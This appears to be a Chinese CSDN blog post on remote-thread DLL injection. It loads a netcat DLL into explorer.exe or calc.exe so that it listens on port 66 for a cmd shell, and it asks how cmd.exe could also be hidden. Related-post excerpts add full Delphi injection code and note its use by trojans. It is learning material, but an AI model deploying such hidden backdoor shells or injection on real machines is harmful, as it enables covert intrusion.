远程线程注入dll的一个例子,netcat.dll

最新推荐文章于 2023-08-18 06:00:00 发布
最新推荐文章于 2023-08-18 06:00:00 发布
阅读量2.2k 收藏
点赞数
分类专栏: nc 分析 源代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oldlinux/article/details/8905039
版权
源代码 同时被 3 个专栏收录
54 篇文章 1 订阅
订阅专栏
分析
50 篇文章 2 订阅
订阅专栏
nc
17 篇文章 1 订阅
订阅专栏

远程dll示例,学习远程线程的例子

masm32 v11 免费下载

Windows环境下32位汇编语言程序设计中13章的远程注入dll的例子

说明HideDll.dll既是nc.dll(改了个名,军刀netcat的动态链接库版),相当于nc -LP 66。

loader.exe取自Windows应用程序捆绑核心编程。

也可以用Windows环境下32位汇编语言程序设计RemoteThreadDll中的Load.exe。直接就捆绑到了explorer.exe。

szDesktopClass    db    'Progman',0
szDesktopWindow    db    'Program Manager',0

环境可以下载上面的masm32 v11,然后下载Windows环境下32位汇编语言程序设计中13章的远程注入dll的例子。


BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved )
{
           int id;
    switch ( fdwReason )
    {
        //dll被附加时
    case DLL_PROCESS_ATTACH:
        glhInstance = hinstDLL;

           CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EntryPoint,NULL,0,&id);
        //EntryPoint (NULL,NULL,NULL,0);
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;

}


开始的时候没有CreateThread(),直接调用了Dll的主函数EntryPoint(),结果注入了dll也没发挥作用。

来,需要在DllMain()函数里再创建一个线程。



把netcat.dll注入到calc.exe,但是连接后还是出现cmd.exe
http://v.youku.com/v_show/id_XNTU0MzE2ODky.html
能不能把cmd.exe也隐藏了?


tasklistt /m 可以看出所有的进程加载了哪些dll,我们的dll.dll显示了出来!

explorer.exe                3764 ntdll.dll, kernel32.dll, ADVAPI32.dll,       
                                 RPCRT4.dll, Secur32.dll, BROWSEUI.dll,       
                                 GDI32.dll, USER32.dll, msvcrt.dll,           
                                 ole32.dll, SHLWAPI.dll, OLEAUT32.dll,        
                                 SHDOCVW.dll, CRYPT32.dll, MSASN1.dll,        
                                 CRYPTUI.dll, NETAPI32.dll, VERSION.dll,      
                                 WININET.dll, Normaliz.dll, urlmon.dll,       
                                 iertutil.dll, WINTRUST.dll, IMAGEHLP.dll,    
                                 WLDAP32.dll, SHELL32.dll, UxTheme.dll,       
                                 ShimEng.dll, AcGenral.DLL, WINMM.dll,        
                                 MSACM32.dll, USERENV.dll, IMM32.DLL,         
                                 LPK.DLL, USP10.dll, comctl32.dll,            
                                 comctl32.dll, msctfime.ime,                  
                                 GOOGLEPINYIN2.IME, MSIMG32.dll, gdiplus.dll,
                                 dbghelp.dll, appHelp.dll, CLBCATQ.DLL,       
                                 COMRes.dll, NetdiskExt.dll, MPR.dll,         
                                 PSAPI.DLL, 360UDiskGuard.dll, SETUPAPI.dll,  
                                 cscui.dll, CSCDLL.dll, themeui.dll,          
                                 xpsp2res.dll, msxml3.dll, ACTXPRXY.DLL,      
                                 SAMLIB.dll, msi.dll, LINKINFO.dll,           
                                 ntshrui.dll, ATL.DLL, ieframe.dll,           
                                 stobject.dll, BatMeter.dll, POWRPROF.dll,    
                                 WTSAPI32.dll, WINSTA.dll, MSCTF.dll,         
                                 wdmaud.drv, msacm32.drv, midimap.dll,        
                                 NETSHELL.dll, credui.dll, dot3api.dll,       
                                 rtutils.dll, dot3dlg.dll, OneX.DLL,          
                                 eappcfg.dll, MSVCP60.dll, eappprxy.dll,      
                                 iphlpapi.dll, WS2_32.dll, WS2HELP.dll,       
                                 webcheck.dll, MLANG.dll,                     
                                 WPDShServiceObj.dll, WINHTTP.dll,            
                                 fzshellext.dll, mydocs.dll,                  
                                 PortableDeviceTypes.dll,                     
                                 PortableDeviceApi.dll, SXS.DLL,              
                                 SoftMgrLiteLauncher.dll, safemon.dll,        
                                 Safehmpg.dll, iNetSafe.dll, 360Util.dll,     
                                 rsaenh.dll, browselc.dll, drprov.dll,        
                                 davclnt.dll, DUSER.dll, MSGINA.dll,          
                                 ODBC32.dll, comdlg32.dll, odbcint.dll,       
                                 wiashext.dll, sti.dll, CFGMGR32.dll,         
                                 PDFShell.dll, MSVCP90.dll, MSVCR90.dll,      
                                 Dll.dll, WSOCK32.dll,                        
                                 net_monitor2.0.2.7.dll, MSVCP71.dll,         
                                 MSVCR71.dll, mswsock.dll, hnetcfg.dll,       
                                 wshtcpip.dll        


360Util.dll是360安全卫士注入的。

sitelist
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
12-远程线程注入
https://www.yuque.com/onlyxiu-123com
03-19 574
远程线程注入
netcat.dll(UDP版) by chenghao0511
05-20
netcat.dll(UDP版) by chenghao0511 2013-05-20 by [email protected] dll.dll(netcat.dll:nc -uLp 66) Load.exe injector in explorer.exe 备份在csdn资源库
用友 NCCloud FS文件管理SQL注入
最新发布
众生度尽,方证菩提
08-18 282
子曰:“道千乘之国,敬事而信,节用而爱人,使民以时。”
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8696
用友NC 漏洞汇总
[python] 记录一次简单网络工具“netcat”的编程
m0_68259687的博客
06-22 332
还可以改进的地方:增加对于同一主机其他端口的扫描功能增加对于输入命令错误时服务器端的容错率写注释的时候几乎全部是用翻译软件写的,英语大退步(bushipython很多语法也忘了,不得不说还是要加强对于编程的练习,不过最后看到程序能够正常运行,还是挺开心的。
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第十章 Windows提权(3)代码注入
阿尔泰野狼的博客
10-29 412
本文记录了博主在阅读Black Hat Python 2nd Edition过程中的心得与踩坑经历。
远程dll示例,学习远程线程例子
05-09
远程dll示例,学习远程线程例子. 先运行计算器,然后loader.exe,然后用netcat既军刀nc连接本地的66端口
netcat.zip 源代码
06-11
netcat.zip 源代码
netcat.py:netcat.py-python(2 + 3)netcat
05-09
[]:{{{1 File : README.md Maintainer : Felix C.... 有关代码,请参见netcat.py (带有示例)。 例子 $ ./netcat.py -l -p 8888 # server hi client! # typed on stdin hi server! # from client ^C
GNU_netcat.tar.zip
09-11
官方netcat-0.7.1的tar文件包,小巧精干,用过都说好。
DLL注入实例+教程
10-17
远程注入DLL方法有很多种,也是很多木马病毒所使用的隐藏进程的方法,因为通过程序加载的DLL在进程管理器是没有显示的.这里介绍一种用 CreateRemoteThread 远程建立线程的方式注入DLL. 首先,我们要提升自己的权限,因为远程注入必不可免的要访问到目标进程的内存空间,如果没有足够的系统权限,将无法作任何事.下面是这个函数是用来提升我们想要的权限用的. function EnableDebugPriv: Boolean; var hToken: THandle; tp: TTokenPrivileges; rl: Cardinal; begin Result := false; //打开进程令牌环 OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken); //获得进程本地唯一ID if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then begin tp.PrivilegeCount := 1; tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; //调整权限 Result := AdjustTokenPrivileges(hToken, false, tp, SizeOf(tp), nil, rl); end; end; 关于 OpenProcessToken() 和 AdjustTokenPrivileges() 两个 API 的简单介绍: OpenProcessToken():获得进程访问令牌的句柄. function OpenProcessToken( ProcessHandle: THandle; //要修改访问权限的进程句柄 DesiredAccess: DWORD; //指定你要进行的操作类型 var TokenHandle: THandle//返回的访问令牌指针 ): BOOL; AdjustTokenPrivileges() :调整进程的权限. function AdjustTokenPrivileges( TokenHandle: THandle; // 访问令牌的句柄 DisableAllPrivileges: BOOL; // 决定是进行权限修改还是除能(Disable)所有权限 const NewState: TTokenPrivileges; { 指明要修改的权限,是一个指向TOKEN_PRIVILEGES结构的指针,该结构包含一个数组, 数据组的每个项指明了权限的类型和要进行的操作; } BufferLength: DWORD; //结构PreviousState的长度,如果PreviousState为空,该参数应为 0 var PreviousState: TTokenPrivileges; // 指向TOKEN_PRIVILEGES结构的指针,存放修改前的访问权限的信息 var ReturnLength: DWORD //实际PreviousState结构返回的大小 ) : BOOL; 远程注入DLL其实是通过 CreateRemoteThread 建立一个远程线程调用 LoadLibrary 函数来加载我们指定的DLL,可是如何能让远程线程知道我要加载DLL呢,要知道在Win32系统下,每个进程都拥有自己的4G虚拟地址空间,各个进程之间都是相互独立的。所我们需要在远程进程的内存空间里申请一块内存空间,写入我们的需要注入DLL 的路径. 需要用到的 API 函数有: OpenProcess():打开目标进程,得到目标进程的操作权限,详细参看MSDN function OpenProcess( dwDesiredAccess: DWORD; // 希望获得的访问权限 bInheritHandle: BOOL; // 指明是否希望所获得的句柄可以继承 dwProcessId: DWORD // 要访问的进程ID ): THandle; VirtualAllocEx():用于在目标进程内存空间中申请内存空间以写入DLL的文件名 function VirtualAllocEx( hProcess: THandle; // 申请内存所在的进程句柄 lpAddress: Pointer; // 保留页面的内存地址;一般用nil自动分配 dwSize, // 欲分配的内存大小,字节单位;注意实际分 配的内存大小是页内存大小的整数倍 flAllocationType: DWORD; flProtect: DWORD ): Pointer; WriteProcessMemory():往申请到的空间中写入DLL的文件名 function WriteProcessMemory( hProcess: THandle; //要写入内存数据的目标进程句柄 const lpBaseAddress: Pointer; //要写入的目标进程的内存指针, 需以 VirtualAllocEx() 来申请 lpBuffer: Pointer; //要写入的数据 nSize: DWORD; //写入数据的大小 var lpNumberOfBytesWritten: DWORD //实际写入的大小 ): BOOL; 然后就可以调用 CreateRemoteThread 建立远程线程调用 LoadLibrary 函数来加载我们指定的DLL. CreateRemoteThread() //在一个远程进程中建立线程 function CreateRemoteThread( hProcess: THandle; //远程进程的句柄 lpThreadAttributes: Pointer; //线程安全描述字,指向SECURITY_ATTRIBUTES结构的指针 dwStackSize: DWORD; //线程栈大小,以字节表示 lpStartAddress: TFNThreadStartRoutine; // 一个TFNThreadStartRoutine类型的指针,指向在远程进程中执行的函数地址 lpParameter: Pointer; //传入参数的指针 dwCreationFlags: DWORD; //创建线程的其它标志 var lpThreadId: DWORD //线程身份标志,如果为0, 则不返回 ): THandle; 整个远程注入DLL的具体实现代码如下: function InjectDll(const DllFullPath: string; const dwRemoteProcessId: Cardinal): Boolean; var hRemoteProcess, hRemoteThread: THandle; pszLibFileRemote: Pointer; pszLibAFilename: PwideChar; pfnStartAddr: TFNThreadStartRoutine; memSize, WriteSize, lpThreadId: Cardinal; begin Result := false; // 调整权限,使程序可以访问其他进程的内存空间 if EnableDebugPriv then begin //打开远程线程 PROCESS_ALL_ACCESS 参数表示打开所有的权限 hRemoteProcess := OpenProcess(PROCESS_ALL_ACCESS, false, dwRemoteProcessId); try // 为注入dll文件路径分配内存大小,由于为WideChar,故要乘2 GetMem(pszLibAFilename, Length(DllFullPath) * 2 + 1); // 之所以要转换成 WideChar, 是因为当DLL位于有中文字符的路径下时不会出错 StringToWideChar(DllFullPath, pszLibAFilename, Length(DllFullPath) * 2 + 1); // 计算 pszLibAFilename 的长度,注意,是以字节为单元的长度 memSize := (1 + lstrlenW(pszLibAFilename)) * SizeOf(WCHAR); //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间 pszLibFileRemote := VirtualAllocEx(hRemoteProcess, nil, memSize, MEM_COMMIT, PAGE_READWRITE); if Assigned(pszLibFileRemote) then begin //使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间 if WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, memSize, WriteSize) and (WriteSize = memSize) then begin lpThreadId := 0; // 计算LoadLibraryW的入口地址 pfnStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'LoadLibraryW'); // 启动远程线程LoadLbraryW,通过远程线程调用创建新的线程 hRemoteThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, lpThreadId); // 如果执行成功返回 True; if (hRemoteThread 0) then Result := true; // 释放句柄 CloseHandle(hRemoteThread); end; end; finally // 释放句柄 CloseHandle(hRemoteProcess); end; end; end; 接下来要说的是如何卸载注入目标进程中的DLL,其实原理和注入DLL是完全相同的,只是远程调用调用的函数不同而已,这里要调用的是FreeLibrary,代码如下: function UnInjectDll(const DllFullPath: string; const dwRemoteProcessId: Cardinal): Boolean; // 进程注入和取消注入其实都差不多,只是运行的函数不同而已 var hRemoteProcess, hRemoteThread: THandle; pszLibFileRemote: PChar; pszLibAFilename: PwideChar; pfnStartAddr: TFNThreadStartRoutine; memSize, WriteSize, lpThreadId, dwHandle: Cardinal; begin Result := false; // 调整权限,使程序可以访问其他进程的内存空间 if EnableDebugPriv then begin //打开远程线程 PROCESS_ALL_ACCESS 参数表示打开所有的权限 hRemoteProcess := OpenProcess(PROCESS_ALL_ACCESS, false, dwRemoteProcessId); try // 为注入dll文件路径分配内存大小,由于为WideChar,故要乘2 GetMem(pszLibAFilename, Length(DllFullPath) * 2 + 1); // 之所以要转换成 WideChar, 是因为当DLL位于有中文字符的路径下时不会出错 StringToWideChar(DllFullPath, pszLibAFilename, Length(DllFullPath) * 2 + 1); // 计算 pszLibAFilename 的长度,注意,是以字节为单元的长度 memSize := (1 + lstrlenW(pszLibAFilename)) * SizeOf(WCHAR); //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间 pszLibFileRemote := VirtualAllocEx(hRemoteProcess, nil, memSize, MEM_COMMIT, PAGE_READWRITE); if Assigned(pszLibFileRemote) then begin //使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间 if WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, memSize, WriteSize) and (WriteSize = memSize) then begin // 计算GetModuleHandleW的入口地址 pfnStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'GetModuleHandleW'); //使目标进程调用GetModuleHandleW,获得DLL在目标进程中的句柄 hRemoteThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, lpThreadId); // 等待GetModuleHandle运行完毕 WaitForSingleObject(hRemoteThread, INFINITE); // 获得GetModuleHandle的返回值,存在dwHandle变量中 GetExitCodeThread(hRemoteThread, dwHandle); // 计算FreeLibrary的入口地址 pfnStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'FreeLibrary'); // 使目标进程调用FreeLibrary,卸载DLL hRemoteThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, Pointer(dwHandle), 0, lpThreadId); // 等待FreeLibrary卸载完毕 WaitForSingleObject(hRemoteThread, INFINITE); // 如果执行成功返回 True; if hRemoteProcess 0 then Result := true; // 释放目标进程中申请的空间 VirtualFreeEx(hRemoteProcess, pszLibFileRemote, Length(DllFullPath) + 1, MEM_DECOMMIT); // 释放句柄 CloseHandle(hRemoteThread); end; end; finally // 释放句柄 CloseHandle(hRemoteProcess); end; end; end;
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
08-21
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
linux下共享库的注入技术
05-05
CSDN上竟然没有搜到这个PPT,我就把这个共享上来吧。 好像linux上共享库注入的技术已经比较成熟了,但是没有很多人讨论。。。 相当于windows的hook技术一样。等我再仔细研究研究
dll远程线程注入(支持64bit win7)
07-20
dll注入远程线程。使用的时候创建一个空的工程,然后把代码当做主文件放到工程中,自己写个mian函数调用injectDLL函数就能注入了。菜鸟级友情提醒:64位别忘了编译成x64的可执行文件
易语言远程注入DLL源码
01-14
这个源码不用模块的!纯手工打造,还能学到东西
linux远程注入pdf,远程安装linux系统.pdf
weixin_29496207的博客
05-06 90
远程安装linux系统.pdf通过VNC 远程安装CentOS 或Fedora(一)完全在线安装方式(原操作系统类型不限,前提条件是原系统能够登陆)原操作系统为Centos/Redhat/Fedora,重装为Centos/Redhat/Fedora。首先登陆准备重装的服务器获取如下信息:(以下操作都是在需重装的服务器上进行)1、IP 地址2、子网掩码3、网关和DNS4、网卡MAC 地址(用来区分e...
远程线程及其注入实现示例
m0_62690279的博客
05-03 508
远程线程 先创建一个线程: #include <stdio.h> #include <windows.h> void Fun() { for (int i = 0; i < 10; i++) { Sleep(200); printf("FUN(%d)-------------------\n",i+1); } } DWORD WINAPI ThreadProc(LPVOID lpParameter) { Fun(); return 0; } i
远程命令执行/命令注入 之 命令连接符
箭雨镜屋
04-01 2219
一、理论 远程命令执行可以用到的命令连接符,windows系统和linux系统各有4个,其中3个是共有的,各有1个是特有的: windows系统:| 、||、&&、& linux系统:| 、||、&&、; 各连接符含义如下: | 管道操作符 可以把前一个命令的标准输出传输到后一个命令的标准输入 比如 a | b表示命令a的输出作为命令b的输入 在远程命令执行中,不管a的执行结果是否正确,b都可以执行 || 逻辑或 注意该命令有短路的情况 比如 a
linux创建与dll同名的进程,自己动手写远程进程注入DLL代码,并远程创建线程运行远程注入DLL函数...
weixin_33304375的博客
05-03 231
本帖最后由 cosmoslife 于 2011-10-8 15:09 编辑(我们重在自己动手一步一步写代码)自己动手写远程进程注入DLL代码,并远程创建线程运行远程注入DLL函数说明:共有三个文件第一步,要注入DLL源代码一份,创建步骤打开VC6.0后,选“文件”----“新建”----在弹出的对话框中选”Win32 Dynamic-Link Library”创建一个动态库程序,选择空,然后自...
帮我用Python写一个netcat
03-22
Sure, here is a simple Python code for netcat: ``` import socket def netcat(hostname, port, content): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((hostname, port)) s.sendall...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值